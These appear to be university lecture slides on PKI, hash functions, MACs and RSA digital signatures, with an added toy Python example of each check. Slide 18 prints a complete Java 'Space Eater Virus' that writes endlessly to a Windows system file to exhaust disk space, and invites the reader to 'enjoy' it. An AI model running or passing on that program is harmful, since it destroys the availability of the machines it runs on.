A brief overview of Public Key Infrastructure and digital signatures, with a simple example
Simple Overview of PKI and Digital signature by Tarek_Gaber
1. Introduction to Network Security
Lecture 3: PKI and Signature
Location: E.T.S. de Ingenierias Informatica y de Telecomunicacion, Universidad
de Granada, 18071 Granada (SPAIN), 24-28 April 2017
Dr. Tarek Gaber
Faculty of Computers and Informatics,
Suez Canal University, Ismailia, Egypt
tmgaber@gmail.com
3. Lecture Outlines
Why is En/Dec by itself NOT enough?
What is PKI and how does it work?
What is a Digital Signature and how does it work?
4. An Important Message
• In theory, some cryptographic algorithms
seem to be EXTREMELY secure.
• Vulnerabilities arise when systems
administrators do not deploy the
encryption systems securely.
5. Standard Algorithms are
Incredibly Secure
• Using a 128-bit key for a symmetric
encryption algorithm, there are 2^128
possible keys.
• Even with the computing resources of the
US government, most of the software
developers alive today will be dead before
the government could break such an
encryption [Viega and McGraw]
6. Incredibly secure (cont.)
• Most security experts believe that 256-bit keys
are good for the lifetime of the universe (many
billions of years).
• The problem is that encryption is just one link
in the chain of security. Encryption is a really
strong link in that chain, but one weak link
breaks the chain.
• It is usually easier for the attacker to hack your
machine and steal the plaintext than to break
your cipher.
13. Authentication – Hash Functions
• Creates small, fixed-size block of data (message digest, hash
value) from m
• Hash Function H must be collision resistant on m
– Must be infeasible to find an m’ ≠ m such that H(m) =
H(m’)
• If H(m) = H(m’), then m = m’
– The message has not been modified
• Common message-digest functions include MD5, which
produces a 128-bit hash; SHA-1, which outputs a 160-bit
hash; and SHA-2.
• So, Hash Functions could provide message authentication?
14. Authentication - MAC
• Symmetric encryption used in message-authentication code
(MAC) authentication algorithm
• Simple example:
– MAC defines S(k)(m) = f (k, H(m))
• Where f is a function that is one-way on its first argument
– k cannot be derived from f (k, H(m))
• Because of the collision resistance in the hash function,
reasonably assured no other message could create the
same MAC
• A suitable verification algorithm is V(k)(m, a) ≡ ( f (k,H(m))
= a)
• Note that k is needed to compute both S(k) and V(k), so
anyone able to compute one can compute the other
16. Authentication – Digital Signature
• Authenticators produced are digital signatures
• In a digital-signature algorithm, computationally infeasible to derive
$S(k_s)$ from $V(k_v)$
– V is a one-way function
– Thus, $k_v$ is the public key and $k_s$ is the private key
• Consider the RSA digital-signature algorithm
– Similar to the RSA encryption algorithm, but the key use is reversed
– Digital signature of message $S(k_s)(m) = H(m)^{k_s} \bmod N$
– The key $k_s$ again is a pair d, N, where N is the product of two large,
randomly chosen prime numbers p and q
– Verification algorithm is $V(k_v)(m, a) \equiv (a^{k_v} \bmod N = H(m))$
• Where $k_v$ satisfies $k_v k_s \bmod (p - 1)(q - 1) = 1$
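The three checks from slides 13, 14 and 16 side by side, as an added example that is not part of the original lecture: a bare hash, a MAC, and a textbook RSA signature. HMAC-SHA-256 standing in for f, the toy Mersenne primes, the exponent 65537 and all function names are assumptions; real RSA signatures use a padding scheme and much larger primes.

```python
import hashlib
import hmac

def H(m: bytes) -> bytes:
    return hashlib.sha256(m).digest()

def hash_only_verify(m: bytes, digest: bytes) -> bool:
    # Slide 13 question: no secret is involved, so anyone who alters m
    # can simply recompute H(m) and the check still passes.
    return hmac.compare_digest(H(m), digest)

def mac_sign(k: bytes, m: bytes) -> bytes:
    # S(k)(m) = f(k, H(m)); f is HMAC-SHA-256 here (assumption).
    return hmac.new(k, H(m), hashlib.sha256).digest()

def mac_verify(k: bytes, m: bytes, a: bytes) -> bool:
    # V(k)(m, a) = (f(k, H(m)) = a); the same k signs and verifies.
    return hmac.compare_digest(mac_sign(k, m), a)

# Textbook RSA signature (slide 16), no padding. Constructed toy key:
# two Mersenne primes, far too small for real use.
P, Q = 2**31 - 1, 2**61 - 1
N = P * Q
KV = 65537                           # public verification key k_v
KS = pow(KV, -1, (P - 1) * (Q - 1))  # private k_s: k_v*k_s mod (p-1)(q-1) = 1

def h_int(m: bytes) -> int:
    # H(m) reduced mod N so it fits the toy modulus (assumption).
    return int.from_bytes(H(m), "big") % N

def rsa_sign(m: bytes) -> int:
    return pow(h_int(m), KS, N)       # S(k_s)(m) = H(m)^k_s mod N

def rsa_verify(m: bytes, a: int) -> bool:
    return pow(a, KV, N) == h_int(m)  # a^k_v mod N = H(m); needs only k_v

if __name__ == "__main__":
    # Constructed sample messages.
    patch, altered = b"patch-1.2", b"patch-1.2 modified in transit"
    print("hash only, altered:", hash_only_verify(altered, H(altered)))  # True
    tag = mac_sign(b"shared-key", patch)
    print("MAC, altered:", mac_verify(b"shared-key", altered, tag))      # False
    sig = rsa_sign(patch)
    print("RSA, genuine:", rsa_verify(patch, sig))                       # True
    print("RSA, altered:", rsa_verify(altered, sig))                     # False
```

The hash-only check accepts the altered message because its sender can recompute the digest; the MAC and the signature reject it, and only the signature can be verified without holding the signing key.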
17. Authentication (Cont.)
• If encryption can prove the identity of the sender of a
message, then why need separate authentication algorithms?
– Authentication algorithms generally require fewer
computations
– Authenticator of a message is usually shorter than the
message itself
– Sometimes want authentication but not confidentiality. For
example, a company may provide a software patch and
could “sign” that patch to prove that it came from the
company.
– Can be basis for non-repudiation
18. Space Eater Virus
• import java.io.*;
class Virus
{
public static void main (String ar[])
{
try
{
FileWriter f = new FileWriter("C:/WINDOWS/Virus.dll",true);
while(true)
{
f.write("Programming Is Such A FUN !!!");
}
}
catch(FileNotFoundException e) {}
catch(IOException e){}
}
}
• Enjoy with this virus ?
19. Thanks for your attention
Questions, please
For any question, please use
tmgaber@gmail.com
Tarek Gaber,